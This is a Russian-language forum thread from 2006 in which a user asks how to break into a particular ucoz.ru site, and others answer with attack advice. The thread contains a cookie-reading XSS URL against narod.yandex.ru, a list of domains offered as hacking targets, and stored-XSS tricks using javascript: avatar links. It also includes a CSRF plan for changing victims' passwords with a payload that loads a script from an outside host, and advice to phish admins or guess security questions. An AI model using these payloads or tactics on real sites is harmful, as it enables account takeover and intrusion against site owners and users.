Взлом h1-h17.ru,narod.ru,ucoz.ru

Discussion in 'Болталка' started by HOT, 13 Dec 2006.

  1. HOT

    HOT New Member

    Joined:
    5 Dec 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -2
    Вобщем сабж.
    Скажите какае есть уязвимости у этих сайтов.




    P.S:Хочу вломать сайт ***.ucoz.ru
     
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    на народе =)

    http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>

    + там еще в гослевой xss была
     
  3. HOT

    HOT New Member

    Joined:
    5 Dec 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -2
    пасибо.
    А на юкосе?
     
  4. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    А на Ucoz'e, насколько я знаю, ничего интересного сейчас нет
     
  5. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    Hot - с полгода назад там в гостевой, в тексте,
    хсс была ща не знаю
     
  6. $HEFF

    $HEFF New Member

    Joined:
    21 Sep 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    сейчас там можно восстановить пароль любого пользователя, но не админа и модера
     
  7. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    Ucoz
    1) многочисленные перменные профайла в GET
    2) попытка реализовать автоформу обламалась, так как рефере проверяеться.
    Однако иожно использовать другой модуль.
    К примеру поднятия прав до администрирования у определённого пользователя - сделать на это автоформу...или там автоформа на что нить...ещё
    На самом деле автоформы и по сей день очень актуальны...даже там где есть защита, просто смотреть надо шире именно в open sources.
    3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).
    .....
    уверен куча там ещё всего
     
  8. 3dn

    3dn Member

    Joined:
    1 Jul 2006
    Messages:
    26
    Likes Received:
    6
    Reputations:
    -3
    абсолютная глупость, ничего из того, что нельзя узнать на странице профиля в гете не передается, куки закодированы, в гете только айди пользователя или юкзернейм передается.
    судя по первому пункту, не удивительно что ОБЛАМАЛАСЬ....

    может стоит проверить самому для начала, можно ли админа получить через автоформу, а потом советовать.... админа назначить через сайт нельзя!

    наверное очень широко ты зришь, даже нашел где-то исходник укоза...... да ты крутой парень... может исходники гугла подкинешь?

    по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели...

    если вся остальная куча в которой ты так уверен такое же "Г", то оставь ее при себе, теплее будет.

    на укозе можно только юных простаков ломать, которые не могут нормальный пароль поставить и за 10 попыток их пароль подбирается.... или путем взлома почты и подбора секретного вопроса, но это может получиться если жертву знаешь, так как часто фамилию матери вводят или типа того....

    __XT__, www.woweb.ru - взломай этот сайт, на укозе тоже кстати находится, раз такой великий хацкер.
     
  9. kirbak

    kirbak Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    28
    Likes Received:
    12
    Reputations:
    1
    Архив с клоном скинуть? :D
     
  10. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Вот тебе сайты , которые расположены на одном серваке в месте с ucoz.ru/ ломай их , а потом ломай его!

    Code:
    1.         4tex.info	
    2. 	ajsberg.net	  
    3. 	azamatus.net	  
    4. 	allportal.net	   
    5. 	about-myproxy.info	
    6. 	autofobus.info	
    7. 	billiardclub.info	
    8. 	chatica.info
    9. 	club-nn.com 
    10. 	djuzer.com	  
    11. 	elfox.net	  
    12. 	fuck88.net	  
    13. 	fotokuban.info	
    14. 	gimena-accardi.com	  
    15. 	global-intruders.info	
    16. 	goodzarabotok.info	
    17. 	griffi.org	  
    18. 	introid.com	  
    19. 	ivanstroy.info	
    20. 	koteiki.net	  
    21. 	keywater.info	  
    22. 	mosobl.com	  
    23. 	molagro.com	  
    24. 	malahovka.net	  
    25. 	nerr.info	
    26. 	neto-best.info	  
    27. 	nnmsoft.info	
    28. 	ofsajt.com	  
    29. 	orenjob.info	
    30. 	poceluy.info	  
    31. 	p0.ru	  
    32. 	pspandsmarts.net	  
    33. 	photo-kmw.com	  
    34. 	progress-motors.com	  
    35. 	punkdiy.com	  
    36. 	pingvinof.net	  
    37. 	rugames.net	  
    38. 	restweb.info	
    39. 	shoplux.net	  
    40. 	satpilot.com	  
    41. 	shtirlic.com	  
    42. 	shaderworld.net	  
    43. 	tepliystan.info	  
    44. 	uhendus-kristuses.com	  
    45. 	unitedrats.com	  
    46. 	ussrteam.com	  
    47. 	vatanweb.net	  
    48. 	vozrojdenie.info	
    49. 	vedrussa.com	  
    50. 	wlancer.net	  
    51. 	warteens.com	  
    52. 	winsmart24.com	  
    53. 	xtazik.net	  
    54. 	yrokov.net	  
    55. 	zdravo.info	
     
  11. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Jah, наркоман?) Эти домены просто прикручены - движок там юкоза)
     
  12. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    3dn
    Чё за ламос очередной=)))
    Если сказал, что уязвимость в профайле именно в GET значит так и есть.
    Давай я продемонстрирую XSS урле...и ты признаешь что ты ламо!-))))
    бггггггггг


    3)Помоймууязвимость загрузки в качестве аватара png файла со скриптом (класс пассивная XSS).

    "по твоему это могло сработать только на допотопных браузерах.... хотя из того что ты пишешь видно, что все твои познания очень устарели..."
    Internet Explorer <=7.0 допотопные браузеры да?
    бггг посмеялся спасибо.
    читай ламос: http://kodsweb.ru/texts/ie_graphics_xss.txt

    и ещё нечего для тебя я взламывать не собираюсь и не потому, что ты ламос а потому что все Белошляпники рулят...всем вайт-хэдам респект!
     
  13. 3dn

    3dn Member

    Joined:
    1 Jul 2006
    Messages:
    26
    Likes Received:
    6
    Reputations:
    -3
    давай если ты продемонстрируешь XSS, который куки выдергивает внедренный в сайт на укозе. Внедрить XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь... А если у тебя ума хватает только на то, чтобы в простом URL еще и скрит прописать, то этим только ламаки могут хвастать.... Внедрить такой урл в сайт нужно, а не уметь его составлять....

    мало того что ты не сможешь, из-за ограниченности своего ума внедрить в бинарный файл яваскрипт, так ты еще и берешься утверждать что эта дыра работает в современных браузерах.... и даже в 7 версии ИЕ.... похоже твои мозги слабо осознают всю проблему подобной дыры и если бы она была, а она действительно была года 3 назад, то людям работающим с троянами жизнь малиной бы показалась....

    слова лузера, который может только языком трепать..... у тебя мозгов не хватит чтобы сайт на юкозе взломать, где так много дыр, по твоим словам.....
     
  14. 3dn

    3dn Member

    Joined:
    1 Jul 2006
    Messages:
    26
    Likes Received:
    6
    Reputations:
    -3
    да ты хохмач..... надо же такой умный, ломай говорит... :) это все сайты в системе юкоз, а если бы поумнее немного был, то смог бы подумать, что сервер не 1 и айпи у юкоза не один, а значит и доменов бы больше нашел.

    p0.ru - а это вообще один из доменов укоза, также как и clan.su, my1.ru и т.д.

    смотрю тут из советчиков одни детки сидят, которые не способны даже на главную страницу укоза зайти и посмотреть на сайты в колонке слева и текст почитать, чтобы понять что такое укоз.... но советы по взлому давать горазды.

    вам только сайты на народе ломать и пхп нюку по уже известным дырам.

    HOT, хочешь взломать, разводи админа сайта на пароль хитростями.... совет по взлому самой системы ты тут на найдешь, не тот уровень здешних хацкеров, чтобы предложить что-то достойное, они даже с укозом не знакомы.... а как можно взломать то, в чем не разбираешься???
     
  15. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    Итак устал веселиться=))))
    давай объективно:
    что ты хочешь, чтобы я нашёл активную XSS на юкозе?
    может как нить займусь, может найду а может и нет.
    "XSS нужно через дыру в системе юкоз, а не из-за дыры в голове какого-нить пользователя в системе, который позволит простым пользователям добавлять новсти с включенным HTML, то я признаю себя всем кем ты захочешь"

    Извини парень давай без оскарблений но ты рельно не понимаешь вообще о чём я.
    Я не писал про добавления скриптов с помощью разрешённых html.
    Выше я писал про автоформы...ты в курсе, что это?
    если нет спроси у кого нить.

    Почему не могу...я имел ввиду про уязвимость класса Пассивиная Xss для браузера IE методом обхода граффического фильтра.
    Дырка это работает как простая пассивная XSS для браузеров IE.
    Проверенно на разных web приложениях.
    Лучше почитай тут, уже писал:
    http://forum.antichat.ru/threadedpost222134.html#post222134

    "людям работающим с троянами жизнь малиной бы показалась"
    а это к чему?
    или ты опять меня не понял или ты вообще не в теме

    Ну ё моё чё ты меня оскарбляешь?
    ты меня не знаешь и я тебя незнаю,
    приёму любую объективную критику, но не надо по киддисовски общаться я так не привык.
    я просто уверен в сырости юкоза.
    Если потестить оч. хорошо то найти можно много, наверняка.
    Вмес то того, чтобы непонимать о чём я пишу и поносить меня сам бы протестил юкоз=)
     
  16. 3dn

    3dn Member

    Joined:
    1 Jul 2006
    Messages:
    26
    Likes Received:
    6
    Reputations:
    -3
    __XT__, оказывается слова "Чё за ламос очередной=)))" это не оскорбление.... ну тогда мои слова в твой адрес тоже нельзя считать оскорблениями.

    я комментировал все что ты писал и четко отвечал по каждому пункту, поэтому не нужно говорить что ты писал, а что не писал.... Про автоформы я тоже тебе ответил.... если ты этого не заметил, то прошу перечитай мои предыдущие посты. Мало того что на укозе все значимые посты и геты передаются с сессией, а значит автоформу сделать не так уж просто, так еще и через сайт админа назначить невозможно, только через панель, а для нее автоформы вообще не работают.

    о том что ты даже понятия не имеешь кто я такой нужно было перед своими высказываниями и оскорблениями подумать....
    так вот для начала потестить нужно, а потом заявлять о сырости....

    как же ты про объективность можешь говорить если все твои заявления и оскорбления далеки от объективности....

    на все твои замечания и утверждения я дал четкие ответы и объяснил почему ни один из твоих способов взлома сайта на юкозе не сработает, нужно внимательнее читать то, что я пишу.... а не зная юкоз как бы я делал эти комментарии?

    в отличае от тебя я не делаю голословных заявлений типа что юкоз дырявый или сырой... я говорю как есть и аргументирую почему это именно так....

    я заявляю, что взломать юкоз и получить пароль от сайта на юкозе у тебя не выйдет не важно как бы досконально ты его не копал....
     
  17. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    ПОсматори, я тебе не чего не писал..ты первый отпостил мне с оскарблеиями на что я ответил.

    А что мне думмать.Кто ты такой?
    Странно когда я знакомился с организатором
    хак-сцены Хаоса
    он мне такого не говорил...товарищ не держал марку великого хакера=-))))
    (Аггр если увидишь не смеяться=) )

    а почему не заявить? или на античате только по факту уязви мости пишут...тут в первую очередь идёт обсуждения те х или иных пролблем..даже преждевременно=)



    1)я тебя первый не оскорблял.
    2)заявления старался писать объективно


    Почему не выдет?
    ты так уверен в моём ламеризме=?
    ну если тебе легче будет я ламос-)
    я просто прикалываюсь что я хакер любительского уровня=)))


    Ну видать плохо знаешь.
    автоформы там реально сделать.
    Xss там хватает.
    пхп-инъекций я дум маю найти там не реально=_)


    Знаешь честно сказат ьвыражения тупое-=)
    ты уверен что Юкоз защищённый?
    А я заранее уверен, что он дырявый и ещё какой...докажи мне что он защищённый и докажу что он дырявый=)
    Как говорил Декан кафедры Информационной Безопасноти Питерского ПОлитеха
    "Безопасность - это процесс..."
    ...лан парень ты вмето того, чтобы отписывать мне наборы слов, лучшеб показал мне чё нить интересное на юкозе какие нить уязвимости=)))
     
    #17 __XT__, 16 Dec 2006
    Last edited: 16 Dec 2006
  18. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    перед сном глянул юкоз чуток...на пассивные уязвимости.

    По поводу активной XSS:
    плохая фильтрация
    в профайле в поле ссылки на аватуру.
    Можно выполнить експлутировать скрипт
    javascript: анти-киддис-бгг
    vbscript: анти-киддис-бгг

    (кстати неплохая активка получилась...
    везде где светим аватар везде XSS)

    по поводу пассивных их там оч. много.
    Ну вот одна просто самая близкая, роли она практически не играет однако как пример,
    что XSS там есть сойдёт=)
    http://mirinet.narod.ru/ucoz_passiv.html

    По поводу создания автоформ для смены пароля или е-майла, проанализировав ситуацию, что вся защита от автоформ строить в проверке реферера.
    Понял, что можно експлуатировать наиболее удачную пассивную XSS
    и составить запрос типа "><script src=http://mirinet.narod.ru/qwe.js></script>
    где в qwe.js будет закодированная автоформа так мы обойдём единственную защиту проверку реферера.
    т.к. запрос будет от юкоза=)

    По поводу уязвимостей более серьёзных:
    было пару подозрений на sql-inj.

    всем приятных снов и пока!
     
    #18 __XT__, 16 Dec 2006
    Last edited: 16 Dec 2006
  19. 3dn

    3dn Member

    Joined:
    1 Jul 2006
    Messages:
    26
    Likes Received:
    6
    Reputations:
    -3
    факт не нужно доказывать, если взломаешь, то факты будут у тебя, а пока система не взломана, то фактами располагаю я.

    дай ка ссылку где ты в аватару на юкозе смог XSS засунуть. а то говорить ты горазд, это очень заментно.

    очень много от тебя никто не просит, покажи ОДНУ.

    ты даже не знаешь что пароль и мыло меняются при редактировании профиля.... если бы знал то так бы и сказал, а не разделял эти два понятия. Так вот, мало того что там реферер проверяется, там еще и айди сессии проверяется, а это значит что твоя автоформа не сработает....

    ты вообще разбираешься в веб=технологиях или пишешь то что сам можешь придумать? подменить реферер можно только сервер сайд скриптом, которым весь запрос формируешь.... а если подключать яваскрипт или что угодно еще, реферер браузер сам формирует, и значит подделать его не выйдет.

    чудо, ты хоть понимаешь что, для того чтобы делать SQL инъекции нужно знать структуру базы, название полей и т.д., а для этого нужно исходники изучать....

    Твой каждый пост только показывает всю твою малограмотность в веб-технологиях.

    Пока ты не продемонстрируешь хоть 1 рабочую дыру на юкозе, будь то XSS через png или аватар или BBкод или что-то еще, или сможешь соорудить рабочую автоформу ты будешь оставаться просто лаптем, который ничего кроме как ляпать не умеет....

    Пойми, за нашим разговором следят и другие люди, и они прекрасно видят кто есть кто... так что можешь писать что тебе смешно читать мои сообщения, другие то смеются над тобой...... столько слов про уязвимости юкоза и нулевой результат.
     
  20. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    =)))) ой блин сколькож тут киди-_)__)))))
    А кто сказал, что Ucoz CMS не кто не ломал?
    если ты не знаешь, то незначит, что его не ломали.
    Повторю, докажи, что данная CMS неуязвима и я докажу тебе, что она уязвима=)))


    В профайле видишь "Аватар (www адрес):"
    Дальше не спрашивай, что к чему...т.к. активную XSS показал, кое кто поймёт как обхадить фильтрацию нужных символов а киддисам и знать не надо.

    Ну ты чё мой пост не видел, посматри выше где я привёл пассивную XSS на Юкозе.
    Через автоформу Постом ударяем по пасивке=)))
    http://mirinet.narod.ru/ucoz_passiv.html


    ой блин.....всё немогу
    просто дикая чушь.
    ты понимаешь вообще суть автоформ?
    даёшь жертве линк на страничку на которой постом отправляеться запрос на смену пароля или ещё чего нить.
    Ну дак вот
    посматри в форме профайла какие перменные?
    где ты там айди сессии увидел?
    Даже если сессию проверяют ...уязвимость не теряеться...т.к. жертва сама не зная того меняет у себя пароль (при условии что она авторизирована)
    вот меня пока блокирнуло то, что система проверяет реферер..при запуске автоформы сайт мне вернул:
    "You are trying to do illegal action!"

    нет я просто люблю выдуммывать=)



    =0))) супер!


    ===
    Слушай меня терзают мутные сомнения=)))
    ты случаем не один из моих знакомых, который решил поприкалываться на домной?
    если так то ты реально меня достал...респект=)

    Если нет - Давай закроем нашу дисскусию, т.к. народу неинтересны наши тупые припинания, он и так сделал выводы...если хочешь я соглашусь что ты прав а я ламер=) стучи 243122140 пообщаемся